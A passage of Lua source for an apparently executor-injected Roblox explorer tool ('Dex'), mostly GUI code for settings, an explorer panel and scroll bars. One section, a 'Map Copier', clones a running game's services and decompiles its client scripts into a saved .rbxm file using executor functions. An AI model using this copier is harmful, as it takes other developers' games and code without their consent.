ScriptEditor.Visible = true end end) CloseToggleButton.MouseButton1Up:connect(function() if CloseToggleButton.Active then toggleDex(false) end end) for i,v in pairs(SlideFrame:GetChildren()) do v.MouseButton1Click:connect(function() switchWindows(v.Name) end) v.MouseEnter:connect(function()v.BackgroundTransparency = 0.5 end) v.MouseLeave:connect(function()if CurrentWindow~=v.Name then v.BackgroundTransparency = 1 end end) end function createSetting(name,interName,defaultOn) local newSetting = SettingTemplate:Clone() newSetting.Position = UDim2.new(0,0,0,#SettingList:GetChildren() * 60) newSetting.SName.Text = name local function toggle(on) if on then newSetting.Change.Bar:TweenPosition(UDim2.new(0,32,0,-2),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) newSetting.Change.OnBar:TweenSize(UDim2.new(0,34,0,15),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) newSetting.Status.Text = "On" Settings[interName] = true else newSetting.Change.Bar:TweenPosition(UDim2.new(0,-2,0,-2),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) newSetting.Change.OnBar:TweenSize(UDim2.new(0,0,0,15),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) newSetting.Status.Text = "Off" Settings[interName] = false end end newSetting.Change.MouseButton1Click:connect(function() toggle(not Settings[interName]) end) newSetting.Visible = true newSetting.Parent = SettingList if defaultOn then toggle(true) end end createSetting("Click part to select","ClickSelect",false) createSetting("Selection Box","SelBox",false) createSetting("Clear property value on focus","ClearProps",false) createSetting("Select ungrouped models","SelectUngrouped",true) createSetting("SaveInstance decompiles scripts","SaveInstanceScripts",true) local function getSelection() local t = GetSelection:Invoke() if t and #t > 0 then return t[1] else return nil end end Mouse.Button1Down:connect(function() if CurrentWindow == "Explorer" and Settings.ClickSelect then local target = Mouse.Target if target then SetSelection:Invoke({target}) end end end) TotallyNotSelectionChanged.Event:connect(function() if Settings.SelBox then local success,err = pcall(function() local selection = getSelection() SelectionBox.Adornee = selection end) if err then SelectionBox.Adornee = nil end end end) SettingsListener.OnInvoke = ReturnSetting -- Map Copier function createMapSetting(obj,interName,defaultOn) local function toggle(on) if on then obj.Change.Bar:TweenPosition(UDim2.new(0,32,0,-2),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) obj.Change.OnBar:TweenSize(UDim2.new(0,34,0,15),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) obj.Status.Text = "On" SaveMapSettings[interName] = true else obj.Change.Bar:TweenPosition(UDim2.new(0,-2,0,-2),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) obj.Change.OnBar:TweenSize(UDim2.new(0,0,0,15),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) obj.Status.Text = "Off" SaveMapSettings[interName] = false end end obj.Change.MouseButton1Click:connect(function() toggle(not SaveMapSettings[interName]) end) obj.Visible = true obj.Parent = SaveMapSettingFrame if defaultOn then toggle(true) end end function createCopyWhatSetting(serv) if SaveMapSettings.CopyWhat[serv] then local newSetting = SaveMapCopyTemplate:Clone() newSetting.Position = UDim2.new(0,0,0,#SaveMapCopyList:GetChildren() * 22 + 5) newSetting.Info.Text = serv local function toggle(on) if on then newSetting.Change.enabled.Visible = true SaveMapSettings.CopyWhat[serv] = true else newSetting.Change.enabled.Visible = false SaveMapSettings.CopyWhat[serv] = false end end newSetting.Change.MouseButton1Click:connect(function() toggle(not SaveMapSettings.CopyWhat[serv]) end) newSetting.Visible = true newSetting.Parent = SaveMapCopyList end end createMapSetting(SaveMapSettingFrame.Scripts,"SaveScripts",true) createMapSetting(SaveMapSettingFrame.Terrain,"SaveTerrain",true) createMapSetting(SaveMapSettingFrame.Lighting,"LightingProperties",true) createMapSetting(SaveMapSettingFrame.CameraInstances,"CameraInstances",true) createCopyWhatSetting("Workspace") createCopyWhatSetting("Lighting") createCopyWhatSetting("ReplicatedStorage") createCopyWhatSetting("ReplicatedFirst") createCopyWhatSetting("StarterPack") createCopyWhatSetting("StarterGui") createCopyWhatSetting("StarterPlayer") SaveMapName.Text = tostring(game.PlaceId).."MapCopy" SaveMapButton.MouseButton1Click:connect(function() local copyWhat = {} local copyGroup = Instance.new("Model",game:GetService("ReplicatedStorage")) local copyScripts = SaveMapSettings.SaveScripts local copyTerrain = SaveMapSettings.SaveTerrain local lightingProperties = SaveMapSettings.LightingProperties local cameraInstances = SaveMapSettings.CameraInstances ----------------------------------------------------------------------------------- for i,v in pairs(SaveMapSettings.CopyWhat) do if v then table.insert(copyWhat,i) end end local consoleFunc = printconsole or writeconsole if consoleFunc then consoleFunc("Raspberry Pi's place copier loaded.") consoleFunc("Copying map of game "..tostring(game.PlaceId)..".") end function archivable(root) for i,v in pairs(root:GetChildren()) do if not game:GetService("Players"):GetPlayerFromCharacter(v) then v.Archivable = true archivable(v) end end end function decompileS(root) for i,v in pairs(root:GetChildren()) do pcall(function() if v:IsA("LocalScript") then local isDisabled = v.Disabled v.Disabled = true v.Source = decompile(v) v.Disabled = isDisabled if v.Source == "" then if consoleFunc then consoleFunc("LocalScript "..v.Name.." had a problem decompiling.") end else if consoleFunc then consoleFunc("LocalScript "..v.Name.." decompiled.") end end elseif v:IsA("ModuleScript") then v.Source = decompile(v) if v.Source == "" then if consoleFunc then consoleFunc("ModuleScript "..v.Name.." had a problem decompiling.") end else if consoleFunc then consoleFunc("ModuleScript "..v.Name.." decompiled.") end end end end) decompileS(v) end end for i,v in pairs(copyWhat) do archivable(game[v]) end for j,obj in pairs(copyWhat) do if obj ~= "StarterPlayer" then local newFolder = Instance.new("Folder",copyGroup) newFolder.Name = obj for i,v in pairs(game[obj]:GetChildren()) do if v ~= copyGroup then pcall(function() v:Clone().Parent = newFolder end) end end else local newFolder = Instance.new("Model",copyGroup) newFolder.Name = "StarterPlayer" for i,v in pairs(game[obj]:GetChildren()) do local newObj = Instance.new("Folder",newFolder) newObj.Name = v.Name for _,c in pairs(v:GetChildren()) do if c.Name ~= "ControlScript" and c.Name ~= "CameraScript" then c:Clone().Parent = newObj end end end end end if game:GetService("Workspace").CurrentCamera and cameraInstances then local cameraFolder = Instance.new("Model",copyGroup) cameraFolder.Name = "CameraItems" for i,v in pairs(game:GetService("Workspace").CurrentCamera:GetChildren()) do v:Clone().Parent = cameraFolder end end if copyTerrain then local myTerrain = game:GetService("Workspace").Terrain:CopyRegion(game:GetService("Workspace").Terrain.MaxExtents) myTerrain.Parent = copyGroup end function saveProp(obj,prop,par) local myProp = obj[prop] if type(myProp) == "boolean" then local newProp = Instance.new("BoolValue",par) newProp.Name = prop newProp.Value = myProp elseif type(myProp) == "number" then local newProp = Instance.new("IntValue",par) newProp.Name = prop newProp.Value = myProp elseif type(myProp) == "string" then local newProp = Instance.new("StringValue",par) newProp.Name = prop newProp.Value = myProp elseif type(myProp) == "userdata" then -- Assume Color3 pcall(function() local newProp = Instance.new("Color3Value",par) newProp.Name = prop newProp.Value = myProp end) end end if lightingProperties then local lightingProps = Instance.new("Model",copyGroup) lightingProps.Name = "LightingProperties" saveProp(game.Lighting,"Ambient",lightingProps) saveProp(game.Lighting,"Brightness",lightingProps) saveProp(game.Lighting,"ColorShift_Bottom",lightingProps) saveProp(game.Lighting,"ColorShift_Top",lightingProps) saveProp(game.Lighting,"GlobalShadows",lightingProps) saveProp(game.Lighting,"OutdoorAmbient",lightingProps) saveProp(game.Lighting,"Outlines",lightingProps) saveProp(game.Lighting,"GeographicLatitude",lightingProps) saveProp(game.Lighting,"TimeOfDay",lightingProps) saveProp(game.Lighting,"FogColor",lightingProps) saveProp(game.Lighting,"FogEnd",lightingProps) saveProp(game.Lighting,"FogStart",lightingProps) end if decompile and copyScripts then decompileS(copyGroup) end if SaveInstance then SaveInstance(copyGroup,SaveMapName.Text..".rbxm") elseif saveinstance then saveinstance(getelysianpath()..SaveMapName.Text..".rbxm",copyGroup) end --print("Saved!") if consoleFunc then consoleFunc("The map has been copied.") end SaveMapButton.Text = "The map has been saved" wait(5) SaveMapButton.Text = "Save" end) -- End Copier wait() IntroFrame:TweenPosition(UDim2.new(1,-300,0,0),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.5,true) switchWindows("Explorer") wait(1) SideMenu.Visible = true for i = 0,1,0.1 do IntroFrame.BackgroundTransparency = i IntroFrame.Main.BackgroundTransparency = i IntroFrame.Slant.ImageTransparency = i IntroFrame.Title.TextTransparency = i IntroFrame.Version.TextTransparency = i IntroFrame.Creator.TextTransparency = i wait() end IntroFrame.Visible = false SlideFrame:TweenPosition(UDim2.new(0,0,0,0),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.5,true) OpenScriptEditorButton:TweenPosition(UDim2.new(0,0,0,180),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.5,true) CloseToggleButton:TweenPosition(UDim2.new(0,0,0,210),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.5,true) Slant:TweenPosition(UDim2.new(0,0,0,240),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.5,true) wait(0.5) for i = 1,0,-0.1 do OpenScriptEditorButton.Icon.ImageTransparency = i CloseToggleButton.TextTransparency = i wait() end CloseToggleButton.Active = true CloseToggleButton.AutoButtonColor = true OpenScriptEditorButton.Active = true OpenScriptEditorButton.AutoButtonColor = true end) spawn(function() -- initial states local Option = { -- can modify object parents in the hierarchy Modifiable = false; -- can select objects Selectable = true; } -- MERELY Option.Modifiable = true -- END MERELY -- general size of GUI objects, in pixels local GUI_SIZE = 16 -- padding between items within each entry local ENTRY_PADDING = 1 -- padding between each entry local ENTRY_MARGIN = 1 local Input = game:GetService("UserInputService") local HoldingCtrl = false local HoldingShift = false --[[ # Explorer Panel A GUI panel that displays the game hierarchy. ## Selection Bindables - `Function GetSelection ( )` Returns an array of objects representing the objects currently selected in the panel. - `Function SetSelection ( Objects selection )` Sets the objects that are selected in the panel. `selection` is an array of objects. - `Event SelectionChanged ( )` Fired after the selection changes. ## Option Bindables - `Function GetOption ( string optionName )` If `optionName` is given, returns the value of that option. Otherwise, returns a table of options and their current values. - `Function SetOption ( string optionName, bool value )` Sets `optionName` to `value`. Options: - Modifiable Whether objects can be modified by the panel. Note that modifying objects depends on being able to select them. If Selectable is false, then Actions will not be available. Reparenting is still possible, but only for the dragged object. - Selectable Whether objects can be selected. If Modifiable is false, then left-clicking will perform a drag selection. ## Updates - 2013-09-18 - Fixed explorer icons to match studio explorer. - 2013-09-14 - Added GetOption and SetOption bindables. - Option: Modifiable; sets whether objects can be modified by the panel. - Option: Selectable; sets whether objects can be selected. - Slight modification to left-click selection behavior. - Improved layout and scaling. - 2013-09-13 - Added drag to reparent objects. - Left-click to select/deselect object. - Left-click and drag unselected object to reparent single object. - Left-click and drag selected object to move reparent entire selection. - Right-click while dragging to cancel. - 2013-09-11 - Added explorer panel header with actions. - Added Cut action. - Added Copy action. - Added Paste action. - Added Delete action. - Added drag selection. - Left-click: Add to selection on drag. - Right-click: Add to or remove from selection on drag. - Ensured SelectionChanged fires only when the selection actually changes. - Added documentation and change log. - Fixed thread issue. - 2013-09-09 - Added basic multi-selection. - Left-click to set selection. - Right-click to add to or remove from selection. - Removed "Selection" ObjectValue. - Added GetSelection BindableFunction. - Added SetSelection BindableFunction. - Added SelectionChanged BindableEvent. - Changed font to SourceSans. - 2013-08-31 - Improved GUI sizing based off of `GUI_SIZE` constant. - Automatic font size detection. - 2013-08-27 - Initial explorer panel. ## Todo - Sorting - by ExplorerOrder - by children - by name - Drag objects to reparent ]] local ENTRY_SIZE = GUI_SIZE + ENTRY_PADDING*2 local ENTRY_BOUND = ENTRY_SIZE + ENTRY_MARGIN local HEADER_SIZE = ENTRY_SIZE*2 local FONT = 'SourceSans' local FONT_SIZE do local size = {8,9,10,11,12,14,18,24,36,48} local s local n = math.huge for i = 1,#size do if size[i] <= GUI_SIZE then FONT_SIZE = i - 1 end end end local GuiColor = { Background = Color3.new(233/255, 233/255, 233/255); Border = Color3.new(149/255, 149/255, 149/255); Selected = Color3.new( 96/255, 140/255, 211/255); BorderSelected = Color3.new( 86/255, 125/255, 188/255); Text = Color3.new( 0/255, 0/255, 0/255); TextDisabled = Color3.new(128/255, 128/255, 128/255); TextSelected = Color3.new(255/255, 255/255, 255/255); Button = Color3.new(221/255, 221/255, 221/255); ButtonBorder = Color3.new(149/255, 149/255, 149/255); ButtonSelected = Color3.new(255/255, 0/255, 0/255); Field = Color3.new(255/255, 255/255, 255/255); FieldBorder = Color3.new(191/255, 191/255, 191/255); TitleBackground = Color3.new(178/255, 178/255, 178/255); } ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---- Icon map constants local MAP_ID = 483448923 -- Indices based on implementation of Icon function. local ACTION_CUT = 160 local ACTION_COPY = 161 local ACTION_PASTE = 162 local ACTION_DELETE = 163 local ACTION_SORT = 164 local ACTION_CUT_OVER = 174 local ACTION_COPY_OVER = 175 local ACTION_PASTE_OVER = 176 local ACTION_DELETE_OVER = 177 local ACTION_SORT_OVER = 178 local ACTION_EDITQUICKACCESS = 190 local ACTION_FREEZE = 188 local ACTION_STARRED = 189 local ACTION_ADDSTAR = 184 local ACTION_ADDSTAR_OVER = 187 local NODE_COLLAPSED = 165 local NODE_EXPANDED = 166 local NODE_COLLAPSED_OVER = 179 local NODE_EXPANDED_OVER = 180 local ExplorerIndex = { ["Accessory"] = 32; ["Accoutrement"] = 32; ["AdService"] = 73; ["Animation"] = 60; ["AnimationController"] = 60; ["AnimationTrack"] = 60; ["Animator"] = 60; ["ArcHandles"] = 56; ["AssetService"] = 72; ["Attachment"] = 34; ["Backpack"] = 20; ["BadgeService"] = 75; ["BallSocketConstraint"] = 89; ["BillboardGui"] = 64; ["BinaryStringValue"] = 4; ["BindableEvent"] = 67; ["BindableFunction"] = 66; ["BlockMesh"] = 8; ["BloomEffect"] = 90; ["BlurEffect"] = 90; ["BodyAngularVelocity"] = 14; ["BodyForce"] = 14; ["BodyGyro"] = 14; ["BodyPosition"] = 14; ["BodyThrust"] = 14; ["BodyVelocity"] = 14; ["BoolValue"] = 4; ["BoxHandleAdornment"] = 54; ["BrickColorValue"] = 4; ["Camera"] = 5; ["CFrameValue"] = 4; ["CharacterMesh"] = 60; ["Chat"] = 33; ["ClickDetector"] = 41; ["CollectionService"] = 30; ["Color3Value"] = 4; ["ColorCorrectionEffect"] = 90; ["ConeHandleAdornment"] = 54; ["Configuration"] = 58; ["ContentProvider"] = 72; ["ContextActionService"] = 41; ["CoreGui"] = 46; ["CoreScript"] = 18; ["CornerWedgePart"] = 1; ["CustomEvent"] = 4; ["CustomEventReceiver"] = 4; ["CylinderHandleAdornment"] = 54; ["CylinderMesh"] = 8; ["CylindricalConstraint"] = 89; ["Debris"] = 30; ["Decal"] = 7; ["Dialog"] = 62; ["DialogChoice"] = 63; ["DoubleConstrainedValue"] = 4; ["Explosion"] = 36; ["FileMesh"] = 8; ["Fire"] = 61; ["Flag"] = 38; ["FlagStand"] = 39; ["FloorWire"] = 4; ["Folder"] = 70; ["ForceField"] = 37; ["Frame"] = 48; ["GamePassService"] = 19; ["Glue"] = 34; ["GuiButton"] = 52; ["GuiMain"] = 47; ["GuiService"] = 47; ["Handles"] = 53; ["HapticService"] = 84; ["Hat"] = 45; ["HingeConstraint"] = 89; ["Hint"] = 33; ["HopperBin"] = 22; ["HttpService"] = 76; ["Humanoid"] = 9; ["ImageButton"] = 52; ["ImageLabel"] = 49; ["InsertService"] = 72; ["IntConstrainedValue"] = 4; ["IntValue"] = 4; ["JointInstance"] = 34; ["JointsService"] = 34; ["Keyframe"] = 60; ["KeyframeSequence"] = 60; ["KeyframeSequenceProvider"] = 60; ["Lighting"] = 13; ["LineHandleAdornment"] = 54; ["LocalScript"] = 18; ["LogService"] = 87; ["MarketplaceService"] = 46; ["Message"] = 33; ["Model"] = 2; ["ModuleScript"] = 71; ["Motor"] = 34; ["Motor6D"] = 34; ["MoveToConstraint"] = 89; ["NegateOperation"] = 78; ["NetworkClient"] = 16; ["NetworkReplicator"] = 29; ["NetworkServer"] = 15; ["NumberValue"] = 4; ["ObjectValue"] = 4; ["Pants"] = 44; ["ParallelRampPart"] = 1; ["Part"] = 1; ["ParticleEmitter"] = 69; ["PartPairLasso"] = 57; ["PathfindingService"] = 37; ["Platform"] = 35; ["Player"] = 12; ["PlayerGui"] = 46; ["Players"] = 21; ["PlayerScripts"] = 82; ["PointLight"] = 13; ["PointsService"] = 83; ["Pose"] = 60; ["PrismaticConstraint"] = 89; ["PrismPart"] = 1; ["PyramidPart"] = 1; ["RayValue"] = 4; ["ReflectionMetadata"] = 86; ["ReflectionMetadataCallbacks"] = 86; ["ReflectionMetadataClass"] = 86; ["ReflectionMetadataClasses"] = 86; ["ReflectionMetadataEnum"] = 86; ["ReflectionMetadataEnumItem"] = 86; ["ReflectionMetadataEnums"] = 86; ["ReflectionMetadataEvents"] = 86; ["ReflectionMetadataFunctions"] = 86; ["ReflectionMetadataMember"] = 86; ["ReflectionMetadataProperties"] = 86; ["ReflectionMetadataYieldFunctions"] = 86; ["RemoteEvent"] = 80; ["RemoteFunction"] = 79; ["ReplicatedFirst"] = 72; ["ReplicatedStorage"] = 72; ["RightAngleRampPart"] = 1; ["RocketPropulsion"] = 14; ["RodConstraint"] = 89; ["RopeConstraint"] = 89; ["Rotate"] = 34; ["RotateP"] = 34; ["RotateV"] = 34; ["RunService"] = 66; ["ScreenGui"] = 47; ["Script"] = 6; ["ScrollingFrame"] = 48; ["Seat"] = 35; ["Selection"] = 55; ["SelectionBox"] = 54; ["SelectionPartLasso"] = 57; ["SelectionPointLasso"] = 57; ["SelectionSphere"] = 54; ["ServerScriptService"] = 0; ["ServerStorage"] = 74; ["Shirt"] = 43; ["ShirtGraphic"] = 40; ["SkateboardPlatform"] = 35; ["Sky"] = 28; ["SlidingBallConstraint"] = 89; ["Smoke"] = 59; ["Snap"] = 34; ["Sound"] = 11; ["SoundService"] = 31; ["Sparkles"] = 42; ["SpawnLocation"] = 25; ["SpecialMesh"] = 8; ["SphereHandleAdornment"] = 54; ["SpotLight"] = 13; ["SpringConstraint"] = 89; ["StarterCharacterScripts"] = 82; ["StarterGear"] = 20; ["StarterGui"] = 46; ["StarterPack"] = 20; ["StarterPlayer"] = 88; ["StarterPlayerScripts"] = 82; ["Status"] = 2; ["StringValue"] = 4; ["SunRaysEffect"] = 90; ["SurfaceGui"] = 64; ["SurfaceLight"] = 13; ["SurfaceSelection"] = 55; ["Team"] = 24; ["Teams"] = 23; ["TeleportService"] = 81; ["Terrain"] = 65; ["TerrainRegion"] = 65; ["TestService"] = 68; ["TextBox"] = 51; ["TextButton"] = 51; ["TextLabel"] = 50; ["Texture"] = 10; ["TextureTrail"] = 4; ["Tool"] = 17; ["TouchTransmitter"] = 37; ["TrussPart"] = 1; ["UnionOperation"] = 77; ["UserInputService"] = 84; ["Vector3Value"] = 4; ["VehicleSeat"] = 35; ["VelocityMotor"] = 34; ["WedgePart"] = 1; ["Weld"] = 34; ["Workspace"] = 19; } ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- function Create(ty,data) local obj if type(ty) == 'string' then obj = Instance.new(ty) else obj = ty end for k, v in pairs(data) do if type(k) == 'number' then v.Parent = obj else obj[k] = v end end return obj end local barActive = false local activeOptions = {} function createDDown(dBut, callback,...) if barActive then for i,v in pairs(activeOptions) do v:Destroy() end activeOptions = {} barActive = false return else barActive = true end local slots = {...} local base = dBut for i,v in pairs(slots) do local newOption = base:Clone() newOption.ZIndex = 5 newOption.Name = "Option "..tostring(i) newOption.Parent = base.Parent.Parent.Parent newOption.BackgroundTransparency = 0 newOption.ZIndex = 2 table.insert(activeOptions,newOption) newOption.Position = UDim2.new(-0.4, dBut.Position.X.Offset, dBut.Position.Y.Scale, dBut.Position.Y.Offset + (#activeOptions * dBut.Size.Y.Offset)) newOption.Text = slots[i] newOption.MouseButton1Down:connect(function() dBut.Text = slots[i] callback(slots[i]) for i,v in pairs(activeOptions) do v:Destroy() end activeOptions = {} barActive = false end) end end -- Connects a function to an event such that it fires asynchronously function Connect(event,func) return event:connect(function(...) local a = {...} spawn(function() func(unpack(a)) end) end) end -- returns the ascendant ScreenGui of an object function GetScreen(screen) if screen == nil then return nil end while not screen:IsA("ScreenGui") do screen = screen.Parent if screen == nil then return nil end end return screen end do local ZIndexLock = {} -- Sets the ZIndex of an object and its descendants. Objects are locked so -- that SetZIndexOnChanged doesn't spawn multiple threads that set the -- ZIndex of the same object. function SetZIndex(object,z) if not ZIndexLock[object] then ZIndexLock[object] = true if object:IsA'GuiObject' then object.ZIndex = z end local children = object:GetChildren() for i = 1,#children do SetZIndex(children[i],z) end ZIndexLock[object] = nil end end function SetZIndexOnChanged(object) return object.Changed:connect(function(p) if p == "ZIndex" then SetZIndex(object,object.ZIndex) end end) end end ---- IconMap ---- -- Image size: 256px x 256px -- Icon size: 16px x 16px -- Padding between each icon: 2px -- Padding around image edge: 1px -- Total icons: 14 x 14 (196) local Icon do local iconMap = 'http://www.roblox.com/asset/?id=' .. MAP_ID game:GetService('ContentProvider'):Preload(iconMap) local iconDehash do -- 14 x 14, 0-based input, 0-based output local f=math.floor function iconDehash(h) return f(h/14%14),f(h%14) end end function Icon(IconFrame,index) local row,col = iconDehash(index) local mapSize = Vector2.new(256,256) local pad,border = 2,1 local iconSize = 16 local class = 'Frame' if type(IconFrame) == 'string' then class = IconFrame IconFrame = nil end if not IconFrame then IconFrame = Create(class,{ Name = "Icon"; BackgroundTransparency = 1; ClipsDescendants = true; Create('ImageLabel',{ Name = "IconMap"; Active = false; BackgroundTransparency = 1; Image = iconMap; Size = UDim2.new(mapSize.x/iconSize,0,mapSize.y/iconSize,0); }); }) end IconFrame.IconMap.Position = UDim2.new(-col - (pad*(col+1) + border)/iconSize,0,-row - (pad*(row+1) + border)/iconSize,0) return IconFrame end end ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---- ScrollBar do -- AutoButtonColor doesn't always reset properly local function ResetButtonColor(button) local active = button.Active button.Active = not active button.Active = active end local function ArrowGraphic(size,dir,scaled,template) local Frame = Create('Frame',{ Name = "Arrow Graphic"; BorderSizePixel = 0; Size = UDim2.new(0,size,0,size); Transparency = 1; }) if not template then template = Instance.new("Frame") template.BorderSizePixel = 0 end local transform if dir == nil or dir == 'Up' then function transform(p,s) return p,s end elseif dir == 'Down' then function transform(p,s) return UDim2.new(0,p.X.Offset,0,size-p.Y.Offset-1),s end elseif dir == 'Left' then function transform(p,s) return UDim2.new(0,p.Y.Offset,0,p.X.Offset),UDim2.new(0,s.Y.Offset,0,s.X.Offset) end elseif dir == 'Right' then function transform(p,s) return UDim2.new(0,size-p.Y.Offset-1,0,p.X.Offset),UDim2.new(0,s.Y.Offset,0,s.X.Offset) end end local scale if scaled then function scale(p,s) return UDim2.new(p.X.Offset/size,0,p.Y.Offset/size,0),UDim2.new(s.X.Offset/size,0,s.Y.Offset/size,0) end else function scale(p,s) return p,s end end local o = math.floor(size/4) if size%2 == 0 then local n = size/2-1 for i = 0,n do local t = template:Clone() local p,s = scale(transform( UDim2.new(0,n-i,0,o+i), UDim2.new(0,(i+1)*2,0,1) )) t.Position = p t.Size = s t.Parent = Frame end else local n = (size-1)/2 for i = 0,n do local t = template:Clone() local p,s = scale(transform( UDim2.new(0,n-i,0,o+i), UDim2.new(0,i*2+1,0,1) )) t.Position = p t.Size = s t.Parent = Frame end end if size%4 > 1 then local t = template:Clone() local p,s = scale(transform( UDim2.new(0,0,0,size-o-1), UDim2.new(0,size,0,1) )) t.Position = p t.Size = s t.Parent = Frame end return Frame end local function GripGraphic(size,dir,spacing,scaled,template) local Frame = Create('Frame',{ Name = "Grip Graphic"; BorderSizePixel = 0; Size = UDim2.new(0,size.x,0,size.y); Transparency = 1; }) if not template then template = Instance.new("Frame") template.BorderSizePixel = 0 end spacing = spacing or 2 local scale if scaled then function scale(p) return UDim2.new(p.X.Offset/size.x,0,p.Y.Offset/size.y,0) end else function scale(p) return p end end if dir == 'Vertical' then for i=0,size.x-1,spacing do local t = template:Clone() t.Size = scale(UDim2.new(0,1,0,size.y)) t.Position = scale(UDim2.new(0,i,0,0)) t.Parent = Frame end elseif dir == nil or dir == 'Horizontal' then for i=0,size.y-1,spacing do local t = template:Clone() t.Size = scale(UDim2.new(0,size.x,0,1)) t.Position = scale(UDim2.new(0,0,0,i)) t.Parent = Frame end end return Frame end local mt = { __index = { GetScrollPercent = function(self) return self.ScrollIndex/(self.TotalSpace-self.VisibleSpace) end; CanScrollDown = function(self) return self.ScrollIndex + self.VisibleSpace < self.TotalSpace end; CanScrollUp = function(self) return self.ScrollIndex > 0 end; ScrollDown = function(self) self.ScrollIndex = self.ScrollIndex + self.PageIncrement self:Update() end; ScrollUp = function(self) self.ScrollIndex = self.ScrollIndex - self.PageIncrement self:Update() end; ScrollTo = function(self,index) self.ScrollIndex = index self:Update() end; SetScrollPercent = function(self,percent) self.ScrollIndex = math.floor((self.TotalSpace - self.VisibleSpace)*percent + 0.5) self:Update() end; }; } mt.__index.CanScrollRight = mt.__index.CanScrollDown mt.__index.CanScrollLeft = mt.__index.CanScrollUp mt.__index.ScrollLeft = mt.__index.ScrollUp mt.__index.ScrollRight = mt.__index.ScrollDown function ScrollBar(horizontal) -- create row scroll bar local ScrollFrame = Create('Frame',{ Name = "ScrollFrame"; Position = horizontal and UDim2.new(0,0,1,-GUI_SIZE) or UDim2.new(1,-GUI_SIZE,0,0); Size = horizontal and UDim2.new(1,0,0,GUI_SIZE) or UDim2.new(0,GUI_SIZE,1,0); BackgroundTransparency = 1; Create('ImageButton',{ Name = "ScrollDown"; Position = horizontal and UDim2.new(1,-GUI_SIZE,0,0) or UDim2.new(0,0,1,-GUI_SIZE); Size = UDim2.new(0, GUI_SIZE, 0, GUI_SIZE); BackgroundColor3 = GuiColor.Button; BorderColor3 = GuiColor.Border; --BorderSizePixel = 0; }); Create('ImageButton',{ Name = "ScrollUp"; Size = UDim2.new(0, GUI_SIZE, 0, GUI_SIZE); BackgroundColor3 = GuiColor.Button; BorderColor3 = GuiColor.Border; --BorderSizePixel = 0; }); Create('ImageButton',{ Name = "ScrollBar"; Size = horizontal and UDim2.new(1,-GUI_SIZE*2,1,0) or UDim2.new(1,0,1,-GUI_SIZE*2); Position = horizontal and UDim2.new(0,GUI_SIZE,0,0) or UDim2.new(0,0,0,GUI_SIZE); AutoButtonColor = false; BackgroundColor3 = Color3.new(0.94902, 0.94902, 0.94902); BorderColor3 = GuiColor.Border; --BorderSizePixel = 0; Create('ImageButton',{ Name = "ScrollThumb"; AutoButtonColor = false; Size = UDim2.new(0, GUI_SIZE, 0, GUI_SIZE); BackgroundColor3 = GuiColor.Button; BorderColor3 = GuiColor.Border; --BorderSizePixel = 0; }); }); }) local graphicTemplate = Create('Frame',{ Name="Graphic"; BorderSizePixel = 0; BackgroundColor3 = GuiColor.Border; }) local graphicSize = GUI_SIZE/2 local ScrollDownFrame = ScrollFrame.ScrollDown local ScrollDownGraphic = ArrowGraphic(graphicSize,horizontal and 'Right' or 'Down',true,graphicTemplate) ScrollDownGraphic.Position = UDim2.new(0.5,-graphicSize/2,0.5,-graphicSize/2) ScrollDownGraphic.Parent = ScrollDownFrame local ScrollUpFrame = ScrollFrame.ScrollUp local ScrollUpGraphic = ArrowGraphic(graphicSize,horizontal and 'Left' or 'Up',true,graphicTemplate) ScrollUpGraphic.Position = UDim2.new(0.5,-graphicSize/2,0.5,-graphicSize/2) ScrollUpGraphic.Parent = ScrollUpFrame local ScrollBarFrame = ScrollFrame.ScrollBar local ScrollThumbFrame = ScrollBarFrame.ScrollThumb do local size = GUI_SIZE*3/8 local Decal = GripGraphic(Vector2.new(size,size),horizontal and 'Vertical' or 'Horizontal',2,graphicTemplate) Decal.Position = UDim2.new(0.5,-size/2,0.5,-size/2) Decal.Parent = ScrollThumbFrame end local Class = setmetatable({ GUI = ScrollFrame; ScrollIndex = 0; VisibleSpace = 0; TotalSpace = 0; PageIncrement = 1; },mt) local UpdateScrollThumb if horizontal then function UpdateScrollThumb() ScrollThumbFrame.Size = UDim2.new(Class.VisibleSpace/Class.TotalSpace,0,0,GUI_SIZE) if ScrollThumbFrame.AbsoluteSize.x < GUI_SIZE then ScrollThumbFrame.Size = UDim2.new(0,GUI_SIZE,0,GUI_SIZE) end local barSize = ScrollBarFrame.AbsoluteSize.x ScrollThumbFrame.Position = UDim2.new(Class:GetScrollPercent()*(barSize - ScrollThumbFrame.AbsoluteSize.x)/barSize,0,0,0) end else function UpdateScrollThumb() ScrollThumbFrame.Size = UDim2.new(0,GUI_SIZE,Class.VisibleSpace/Class.TotalSpace,0) if ScrollThumbFrame.AbsoluteSize.y < GUI_SIZE then ScrollThumbFrame.Size = UDim2.new(0,GUI_SIZE,0,GUI_SIZE) end local barSize = ScrollBarFrame.AbsoluteSize.y ScrollThumbFrame.Position = UDim2.new(0,0,Class:GetScrollPercent()*(barSize - ScrollThumbFrame.AbsoluteSize.y)/barSize,0) end end local lastDown local lastUp local scrollStyle = {BackgroundColor3=GuiColor.Border,BackgroundTransparency=0} local scrollStyle_ds = {BackgroundColor3=GuiColor.Border,BackgroundTransparency=0.7} local function Update() local t = Class.TotalSpace local v = Class.VisibleSpace local s = Class.ScrollIndex if v <= t then if s > 0 then if s + v > t then Class.ScrollIndex = t - v end else Class.ScrollIndex = 0 end else Class.ScrollIndex = 0 end if Class.UpdateCallback then if Class.UpdateCallback(Class) == false then return end end local down = Class:CanScrollDown() local up = Class:CanScrollUp() if down ~= lastDown then lastDown = down ScrollDownFrame.Active = down 